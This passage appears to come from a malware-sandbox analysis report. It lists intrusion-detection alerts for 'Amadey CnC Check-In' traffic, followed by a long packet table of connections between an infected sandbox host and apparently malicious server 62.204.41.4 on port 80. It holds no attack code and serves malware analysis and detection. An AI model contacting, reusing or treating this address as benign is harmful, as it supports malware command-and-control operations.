                                                                      192.168.2.762.204.41.449812802027700 02/06/23-18:36:20.476057TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449894802027700 02/06/23-18:36:41.381593TCP2027700ET TROJAN Amadey CnC Check-In4989480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449764802027700 02/06/23-18:36:07.304245TCP2027700ET TROJAN Amadey CnC Check-In4976480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450253802027700 02/06/23-18:38:19.923435TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450301802027700 02/06/23-18:38:33.190298TCP2027700ET TROJAN Amadey CnC Check-In5030180192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.449914802027700 02/06/23-18:36:49.185768TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450294802027700 02/06/23-18:38:31.479059TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450075802027700 02/06/23-18:37:34.012824TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450164802027700 02/06/23-18:37:56.874762TCP2027700ET TROJAN Amadey CnC Check-In5016480192.168.2.762.204.41.4
                                                                      192.168.2.762.204.41.450034802027700 02/06/23-18:37:22.947074TCP2027700ET TROJAN Amadey CnC Check-In5003480192.168.2.762.204.41.4
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Feb 6, 2023 18:35:55.927301884 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:55.927752018 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:55.989209890 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:55.989393950 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:55.989929914 CET804972462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:55.990781069 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.006951094 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.007021904 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.068619013 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.069742918 CET804972462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.069925070 CET804972462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.071388960 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.075514078 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.075737953 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.099328995 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.161078930 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161401987 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161428928 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161452055 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161468983 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161482096 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161519051 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161560059 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161581039 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161598921 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161617994 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.161623955 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.161668062 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.161668062 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.197876930 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.198956013 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223263025 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223304033 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223324060 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223344088 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223362923 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223370075 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223382950 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223401070 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223416090 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223419905 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223433971 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223439932 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223459005 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.223474979 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223495007 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.223526955 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.259802103 CET804972662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.259948015 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.260662079 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.260756016 CET804972462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.260829926 CET4972480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285206079 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285240889 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285259962 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285279036 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285298109 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285312891 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285315990 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285335064 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285347939 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285352945 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285367966 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285371065 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285389900 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285391092 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285408020 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.285414934 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.285444975 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.322364092 CET804972662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.327101946 CET804972662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.327406883 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.346916914 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.346954107 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.346971989 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.346992016 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347011089 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347028971 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347048044 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347065926 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347084045 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347090960 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.347101927 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347120047 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.347186089 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.408791065 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408828020 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408847094 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408869028 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408888102 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408909082 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408963919 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.408972979 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.408982992 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.409002066 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.409020901 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.409024954 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.409039021 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.409084082 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.409084082 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.409104109 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.409120083 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.409166098 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.470726013 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470797062 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470830917 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470863104 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470870972 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.470894098 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470925093 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470931053 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.470956087 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.470966101 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.470987082 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.471019983 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.471019983 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.471050024 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.471061945 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.471080065 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.471093893 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.471112013 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.471131086 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.471155882 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.478319883 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.479176998 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.532807112 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533009052 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533056021 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533118963 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533149958 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533178091 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.533199072 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.533255100 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.533255100 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.539407015 CET804972662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.541369915 CET804972762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.541512966 CET4972680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.541568041 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.731344938 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.793847084 CET804972762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.798099041 CET804972762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.798202038 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.928816080 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.929091930 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.929948092 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.990909100 CET804972562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.991152048 CET804972762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.991368055 CET4972580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.992121935 CET804972862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:56.992191076 CET4972780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:56.992331982 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.036982059 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.099335909 CET804972862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.103548050 CET804972862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.104279995 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.252998114 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.255824089 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.314825058 CET804972862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.315009117 CET4972880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.317682028 CET804972962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.317861080 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.348762989 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.410578966 CET804972962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.413033962 CET804972962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.413172007 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.934293985 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.934990883 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.995990038 CET804972962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.996174097 CET4972980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:57.997437954 CET804973062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:57.997570038 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.016248941 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.078794956 CET804973062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.084274054 CET804973062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.084526062 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.226327896 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.227330923 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.286987066 CET804973162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.287081957 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.287698030 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.288853884 CET804973062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.288939953 CET4973080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.347064018 CET804973162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.349608898 CET804973162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.349724054 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.503546000 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.504434109 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.563184023 CET804973162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.563353062 CET4973180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:58.566046000 CET804973262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:58.566189051 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.129342079 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.191168070 CET804973262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.197772980 CET804973262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.197941065 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.718357086 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.719398975 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.780191898 CET804973262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.780261993 CET804973362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.780294895 CET4973280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.780349970 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.781455994 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.842576981 CET804973362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.849287033 CET804973362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:35:59.849419117 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.960769892 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:35:59.961818933 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.022156954 CET804973362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.022252083 CET4973380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.024112940 CET804973462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.024276018 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.024734020 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.086956024 CET804973462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.093935013 CET804973462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.094094038 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.216378927 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.217192888 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.277741909 CET804973562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.277874947 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.278414965 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.278624058 CET804973462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.278727055 CET4973480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.339060068 CET804973562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.341404915 CET804973562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.341476917 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.456774950 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.458628893 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.517509937 CET804973562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.517748117 CET4973580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.521207094 CET804973662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.521732092 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.525448084 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.587937117 CET804973662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.590553045 CET804973662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.590651989 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.706166029 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.707168102 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.768515110 CET804973762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.768559933 CET804973662.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.768652916 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.768709898 CET4973680192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.769093990 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.830445051 CET804973762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.832873106 CET804973762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:00.832981110 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.946501970 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:00.958568096 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.008265018 CET804973762.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.008352041 CET4973780192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.019371986 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.019665956 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.020544052 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.081216097 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.085381031 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.085551023 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.203288078 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.203911066 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.264082909 CET804973862.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.264341116 CET4973880192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.265259027 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.265423059 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.266268015 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.327723026 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.331387043 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.331541061 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.442477942 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.443190098 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.503952980 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.504009008 CET804973962.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.504192114 CET4973980192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.504410982 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.508138895 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.568891048 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.572156906 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.572357893 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.674979925 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.676522970 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.735892057 CET804974062.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.736025095 CET4974080192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.737852097 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.737999916 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.744620085 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.806118011 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.808621883 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.808832884 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.924973965 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.925661087 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.985292912 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.985420942 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.986509085 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:01.986547947 CET804974162.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:01.986638069 CET4974180192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.045990944 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.050532103 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.050724030 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.172569990 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.173794985 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.232286930 CET804974262.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.232494116 CET4974280192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.235124111 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.235337019 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.235831976 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.297024012 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.300020933 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.300312996 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.409369946 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.412878990 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.470851898 CET804974362.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.471018076 CET4974380192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.474483967 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.474662066 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.475153923 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.536710024 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.539536953 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.539650917 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.645144939 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.645919085 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.706635952 CET804974562.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.706790924 CET4974580192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.706799984 CET804974462.204.41.4192.168.2.7
                                                                      Feb 6, 2023 18:36:02.706861019 CET4974480192.168.2.762.204.41.4
                                                                      Feb 6, 2023 18:36:02.707218885 CET4974580192.168.2.762.204.41.4
